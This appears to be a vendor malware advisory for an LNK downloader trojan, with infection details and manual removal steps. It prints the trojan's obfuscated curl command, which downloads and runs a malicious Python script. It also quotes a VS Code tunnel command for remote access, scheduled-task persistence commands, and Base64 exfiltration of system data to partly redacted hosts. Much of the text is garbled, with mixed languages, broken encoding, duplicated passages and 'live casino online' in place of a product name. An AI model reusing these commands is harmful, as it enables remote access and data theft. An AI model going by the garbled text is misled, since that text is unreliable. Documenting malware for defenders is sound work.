Trojan.LNK.DOWNLOADER.D
Publish Date: 02 octobre 2024
HEUR:Trojan.WinLNK.Agent.gen (KASPERSKY)
Plate-forme:
Windows
Overall Risk:
Dommages potentiels: :
Distribution potentielle: :
reportedInfection:
Information Exposure Rating::
Faible
Medium
?±ô±ð±¹¨¦
Critique
Type de grayware:
Trojan
Destructif:
Non
Chiffrement:
In the wild::
Oui
Overview
Voie d'infection: Aus dem Internet heruntergeladen, Fallen gelassen von anderer Malware
It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
D¨¦tails techniques
File size: 2,044 bytes
File type: LNK
Date de r¨¦ception des premiers ¨¦chantillons: 30 septembre 2024
Charge malveillante: Drops files, Connects to URLs/IPs
?bertragungsdetails
It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Installation
Schleust die folgenden Dateien ein:
- %AppDataLocal%\Microsoft\Python\update.py
- %AppDataLocal%\Microsoft\python.zip
- After extracting to %AppDataLocal%\Microsoft\Python:
- _asyncio.pyd
- _bz2.pyd
- _ctypes.pyd
- _decimal.pyd
- _elementtree.pyd
- _hashlib.pyd
- _lzma.pyd
- _msi.pyd
- _multiprocessing.pyd
- _overlapped.pyd
- _queue.pyd
- _socket.pyd
- _sqlite3.pyd
- _ssl.pyd
- _uuid.pyd
- _wmi.pyd
- _zoneinfo.pyd
- libcrypto-3.dll
- libffi-8.dll
- libssl-3.dll
- LICENSE.txt
- pyexpat.pyd
- python.cat
- python.exe
- python.zip
- python3.dll
- python312._pth
- python312.dll
- python312.zip
- pythonw.exe
- select.pyd
- sqlite3.dll
- unicodedata.pyd
- vcruntime140_1.dll
- vcruntime140.dll
- winsound.pyd
- After extracting to %AppDataLocal%\Microsoft\Python:
F¨¹gt die folgenden Prozesse hinzu:
- "%System%\cmd.exe" /c start msg {Username} "°²Ñb³É¹¦" & c^u^r^l -s -k https://www.{BLOCKED}n.org/ftp/python/3.12.5/python-3.12.5-embed-amd64.zip -o "%AppDataLocal%\Microsoft\python.zip" & timeout 10 & mkdir "%AppDataLocal%\Microsoft\Python" & tar -xf "%AppDataLocal%\Microsoft\python.zip" -C "%AppDataLocal%\Microsoft\Python" & c^u^r^l -s -k https://{BLOCKED}e.ee/r/DQjrd/0 -o "%AppDataLocal%\Microsoft\Python\update.py" & start "" /B "%AppDataLocal%\Microsoft\Python\pythonw.exe" "%AppDataLocal%\Microsoft\Python\update.py"
Erstellt die folgenden Ordner:
- %AppDataLocal%\Microsoft\Python
Download-Routine
Speichert die heruntergeladenen Dateien unter den folgenden Namen:
- %AppDataLocal%\Microsoft\python.zip ¡ú legitimate Python 3.12.5 x64 zip file
- %AppDataLocal%\Microsoft\Python\update.py ¡ú malicious Python code
Andere Details
Es macht Folgendes:
- It sends Windows message "°²Ñb³É¹¦" translated to "Installation successful".
- It downloads a legitimate 64-bit Python 3.12.5 embedded zip file and extracts its contents.
- It downloads a malicious Python script file from a URL and executes using the extracted Python package.
- It requires the following command line tools to proceed with its intended routine:
- curl
- tar
- The executed Python code does the following:
- It fetches running processes using tasklist command.
- It connects to the following URL(s) to download its component file(s):
- https://{BLOCKED}95.vo.msecnd.net/stable/97dec172d3256f8ca4bfb2143f3f76b503ca0534/vscode_cli_win32_x64_cli.zip
- It saves the files it downloads using the following names:
- %AppDataLocal%\Microsoft\vscode.zip ¡ú contains a file named code.exe
- It adds the following folders:
- %AppDataLocal%\Microsoft\VSCode
- It extracts the zip file into the created folder with the following filename:
- %AppDataLocal%\Microsoft\VSCode\code.exe
- After extraction, it deletes the previously downloaded zip file.
- It adds the following processes:
- %System%\cmd.exe /c "%AppDataLocal%\Microsoft\VSCode\code.exe tunnel --accept-server-license-terms user logout"
- %System%\cmd.exe /c "%AppDataLocal%\Microsoft\VSCode\code.exe --locale en-US tunnel --accept-server-license-terms --name "{Computer Name}"
- Saves the output into the following files:
- %AppDataLocal%\Microsoft\VSCode\output.txt
- %AppDataLocal%\Microsoft\VSCode\output2.txt
- Saves the output into the following files:
- schtasks /create /tn "MicrosoftHealthcareMonitorNode" /tr "%AppDataLocal%\Microsoft\Python\pythonw.exe %AppDataLocal%\Microsoft\Python\update.py" /st 08:00 /sc HOURLY /mo 4 /f
- schtasks /create /tn "MicrosoftHealthcareMonitorNode" /tr "%AppDataLocal%\Microsoft\Python\pythonw.exe %AppDataLocal%\Microsoft\Python\update.py" /sc ONLOGON /ru SYSTEM /rl HIGHEST /f
- It retrieves the following information from the affected system:
- System Locale
- Computer Name
- Username
- User Domain
- %Program Files% Contents
- %ProgramData% Contents
- %System Root%\Users Contents
- It encodes the collected information into a Base64 format.
- It sends the gathered information via HTTP POST to the following URL:
- http://{BLOCKED}o.com/r/2yxp98b3/{Encoded Base64 String of Collected information}
- It adds the following scheduled tasks:
- If executed as user:
- Location: {Root Directory}
Name: MicrosoftHealthcareMonitorNode
Trigger: One time at 8:00 AM on {Scheduled Task Create Time} ¡ú After triggered, repeat every 04:00:00 indefinitely.
Action: Start a program ¡ú %AppDataLocal%\Microsoft\Python\pythonw.exe %AppDataLocal%\Microsoft\Python\update.py
- Location: {Root Directory}
- If executed as an administrator:
- Location: {Root Directory}
Name: MicrosoftHealthcareMonitorNode
Trigger: At log on of any user
Action: Start a program ¡ú %AppDataLocal%\Microsoft\Python\pythonw.exe %AppDataLocal%\Microsoft\Python\update.py
- Location: {Root Directory}
- If executed as user:
Solutions
Moteur de scan minimum: 9.800
First VSAPI Pattern File: 19.624.03
First VSAPI Pattern Release Date: 01 octobre 2024
VSAPI OPR Pattern Version: 19.625.00
VSAPI OPR Pattern Release Date: 02 octobre 2024
Step 1
F¨¹r Windows ME und XP Benutzer: Stellen Sie vor einer Suche sicher, dass die Systemwiederherstellung deaktiviert ist, damit der gesamte Computer durchsucht werden kann.
Step 2
<p> Beachten Sie, dass nicht alle Dateien, Ordner, Registrierungsschlüssel und Einträge auf Ihrem Computer installiert sind, während diese Malware / Spyware / Grayware ausgeführt wird. Dies kann auf eine unvollständige Installation oder andere Betriebssystembedingungen zurückzuführen sein. Fahren Sie mit dem nächsten Schritt fort. </ p><p> Beachten Sie, dass nicht alle Dateien, Ordner, Registrierungsschlüssel und Einträge auf Ihrem Computer installiert sind, während diese Malware / Spyware / Grayware ausgeführt wird. Dies kann auf eine unvollständige Installation oder andere Betriebssystembedingungen zurückzuführen sein. Fahren Sie mit dem nächsten Schritt fort. </ p>
Step 3
Im abgesicherten Modus neu starten
[ learnMore ]
Step 5
Diese Dateien suchen und l?schen
[ learnMore ]
M?glicherweise sind einige Komponentendateien verborgen. Aktivieren Sie unbedingt das Kontrollk?stchen Versteckte Elemente durchsuchen unter "Weitere erweiterte Optionen", um alle verborgenen Dateien und Ordner in den Suchergebnissen zu ber¨¹cksichtigen. - %AppDataLocal%\Microsoft\Python\update.py
- %AppDataLocal%\Microsoft\Python\_asyncio.pyd
- %AppDataLocal%\Microsoft\Python\_bz2.pyd
- %AppDataLocal%\Microsoft\Python\_ctypes.pyd
- %AppDataLocal%\Microsoft\Python\_decimal.pyd
- %AppDataLocal%\Microsoft\Python\_elementtree.pyd
- %AppDataLocal%\Microsoft\Python\_hashlib.pyd
- %AppDataLocal%\Microsoft\Python\_lzma.pyd
- %AppDataLocal%\Microsoft\Python\_msi.pyd
- %AppDataLocal%\Microsoft\Python\_multiprocessing.pyd
- %AppDataLocal%\Microsoft\Python\_overlapped.pyd
- %AppDataLocal%\Microsoft\Python\_queue.pyd
- %AppDataLocal%\Microsoft\Python\_socket.pyd
- %AppDataLocal%\Microsoft\Python\_sqlite3.pyd
- %AppDataLocal%\Microsoft\Python\_ssl.pyd
- %AppDataLocal%\Microsoft\Python\_uuid.pyd
- %AppDataLocal%\Microsoft\Python\_wmi.pyd
- %AppDataLocal%\Microsoft\Python\_zoneinfo.pyd
- %AppDataLocal%\Microsoft\Python\libcrypto-3.dll
- %AppDataLocal%\Microsoft\Python\libffi-8.dll
- %AppDataLocal%\Microsoft\Python\libssl-3.dll
- %AppDataLocal%\Microsoft\Python\LICENSE.txt
- %AppDataLocal%\Microsoft\Python\pyexpat.pyd
- %AppDataLocal%\Microsoft\Python\python.cat
- %AppDataLocal%\Microsoft\Python\python.exe
- %AppDataLocal%\Microsoft\Python\python.zip
- %AppDataLocal%\Microsoft\Python\python3.dll
- %AppDataLocal%\Microsoft\Python\python312._pth
- %AppDataLocal%\Microsoft\Python\python312.dll
- %AppDataLocal%\Microsoft\Python\python312.zip
- %AppDataLocal%\Microsoft\Python\pythonw.exe
- %AppDataLocal%\Microsoft\Python\select.pyd
- %AppDataLocal%\Microsoft\Python\sqlite3.dll
- %AppDataLocal%\Microsoft\Python\unicodedata.pyd
- %AppDataLocal%\Microsoft\Python\vcruntime140_1.dll
- %AppDataLocal%\Microsoft\Python\vcruntime140.dll
- %AppDataLocal%\Microsoft\Python\winsound.pyd
- %AppDataLocal%\Microsoft\VSCode\code.exe
- %AppDataLocal%\Microsoft\VSCode\output.txt
- %AppDataLocal%\Microsoft\VSCode\output2.txt
- %AppDataLocal%\Microsoft\python.zip
- %AppDataLocal%\Microsoft\vscode.zip
- %AppDataLocal%\Microsoft\Python\update.py
- %AppDataLocal%\Microsoft\Python\_asyncio.pyd
- %AppDataLocal%\Microsoft\Python\_bz2.pyd
- %AppDataLocal%\Microsoft\Python\_ctypes.pyd
- %AppDataLocal%\Microsoft\Python\_decimal.pyd
- %AppDataLocal%\Microsoft\Python\_elementtree.pyd
- %AppDataLocal%\Microsoft\Python\_hashlib.pyd
- %AppDataLocal%\Microsoft\Python\_lzma.pyd
- %AppDataLocal%\Microsoft\Python\_msi.pyd
- %AppDataLocal%\Microsoft\Python\_multiprocessing.pyd
- %AppDataLocal%\Microsoft\Python\_overlapped.pyd
- %AppDataLocal%\Microsoft\Python\_queue.pyd
- %AppDataLocal%\Microsoft\Python\_socket.pyd
- %AppDataLocal%\Microsoft\Python\_sqlite3.pyd
- %AppDataLocal%\Microsoft\Python\_ssl.pyd
- %AppDataLocal%\Microsoft\Python\_uuid.pyd
- %AppDataLocal%\Microsoft\Python\_wmi.pyd
- %AppDataLocal%\Microsoft\Python\_zoneinfo.pyd
- %AppDataLocal%\Microsoft\Python\libcrypto-3.dll
- %AppDataLocal%\Microsoft\Python\libffi-8.dll
- %AppDataLocal%\Microsoft\Python\libssl-3.dll
- %AppDataLocal%\Microsoft\Python\LICENSE.txt
- %AppDataLocal%\Microsoft\Python\pyexpat.pyd
- %AppDataLocal%\Microsoft\Python\python.cat
- %AppDataLocal%\Microsoft\Python\python.exe
- %AppDataLocal%\Microsoft\Python\python.zip
- %AppDataLocal%\Microsoft\Python\python3.dll
- %AppDataLocal%\Microsoft\Python\python312._pth
- %AppDataLocal%\Microsoft\Python\python312.dll
- %AppDataLocal%\Microsoft\Python\python312.zip
- %AppDataLocal%\Microsoft\Python\pythonw.exe
- %AppDataLocal%\Microsoft\Python\select.pyd
- %AppDataLocal%\Microsoft\Python\sqlite3.dll
- %AppDataLocal%\Microsoft\Python\unicodedata.pyd
- %AppDataLocal%\Microsoft\Python\vcruntime140_1.dll
- %AppDataLocal%\Microsoft\Python\vcruntime140.dll
- %AppDataLocal%\Microsoft\Python\winsound.pyd
- %AppDataLocal%\Microsoft\VSCode\code.exe
- %AppDataLocal%\Microsoft\VSCode\output.txt
- %AppDataLocal%\Microsoft\VSCode\output2.txt
- %AppDataLocal%\Microsoft\python.zip
- %AppDataLocal%\Microsoft\vscode.zip
Step 6
Diese Ordner suchen und l?schen
[ learnMore ]
Aktivieren Sie unbedingt das Kontrollk?stchen Versteckte Elemente durchsuchen unter Weitere erweiterte Optionen, um alle verborgenen Ordner in den Suchergebnissen zu ber¨¹cksichtigen. - %AppDataLocal%\Microsoft\Python
- %AppDataLocal%\Microsoft\VSCode
Step 7
F¨¹hren Sie den Neustart im normalen Modus durch, und durchsuchen Sie Ihren Computer mit Ihrem live casino online Produkt nach Dateien, die als Trojan.LNK.DOWNLOADER.D entdeckt werden. Falls die entdeckten Dateien bereits von Ihrem live casino online Produkt ges?ubert, gel?scht oder in Quarant?ne verschoben wurden, sind keine weiteren Schritte erforderlich. Dateien in Quarant?ne k?nnen einfach gel?scht werden. Auf dieser finden Sie weitere Informationen.
Participez ¨¤ notre enqu¨ºte!